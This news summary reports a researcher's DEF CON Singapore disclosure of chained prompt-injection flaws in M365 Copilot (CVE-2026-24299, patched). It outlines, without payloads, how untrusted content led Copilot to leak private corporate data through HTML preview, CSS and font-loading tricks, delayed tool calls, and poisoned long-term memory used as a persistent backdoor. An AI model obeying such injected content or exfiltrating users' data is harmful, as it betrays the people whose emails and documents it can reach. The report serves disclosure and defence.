Security Researcher Discloses Data Exfiltration Chain in Microsoft Copilot; CVE-2026-24299 Now Patched
Key Takeaways
- ▸Multiple chained vulnerabilities in M365 Copilot enabled sophisticated data exfiltration attacks through HTML preview, CSS, and font-loading bypass techniques
- ▸Attackers could hijack Copilot's long-term memory system and install persistent backdoors through prompt injection
- ▸The vulnerabilities demonstrate the critical security risk when AI agents have simultaneous access to private data, untrusted content, and external communication channels
Summary
Security researcher kerng has published a comprehensive writeup of vulnerabilities discovered in Microsoft Copilot and M365 Copilot, presented at DEF CON Singapore. The research details a chain of exploits that enable data exfiltration and persistent backdoor installation, including attacks via HTML preview features, CSS-based bypass techniques, delayed tool invocation tricks, and hijacking of Copilot's long-term memory system.
The vulnerabilities demonstrate what the researcher calls the "lethal trifecta" in AI security: M365 Copilot's access to private corporate data (emails, chats, SharePoint documents) combined with ingestion of untrusted user content and external communication channels creates an attack surface for prompt injection and indirect attacks. The exploit chain allows attackers to extract sensitive information, maintain persistent backdoors, and manipulate Copilot's stored memories through carefully crafted prompts.
Microsoft was notified of these vulnerabilities in 2023 and assigned CVE-2026-24299 to track them. All identified issues have now been patched. The research highlights systemic challenges in securing enterprise AI deployments and aligns with historical data exfiltration issues previously discovered in Bing Chat, ChatGPT, Claude, Gemini, and GitHub Copilot.
- All identified issues have been patched by Microsoft, but the research reveals ongoing challenges in securing enterprise AI systems
- The vulnerability class is endemic across the AI industry, with most major AI platforms requiring patches for similar prompt injection and data exfiltration flaws
Editorial Opinion
This research underscores a fundamental architectural challenge in enterprise AI deployment. When intelligent agents have access to sensitive corporate data while operating on untrusted external content, the attack surface becomes enormous—and current mitigation strategies focusing only on output channels are insufficient. The industry needs a paradigm shift toward zero-trust threat modeling for AI agents, with strict guardrails on what actions and data access these systems should realistically be granted, rather than retrofitting security measures onto systems designed with permissive defaults.


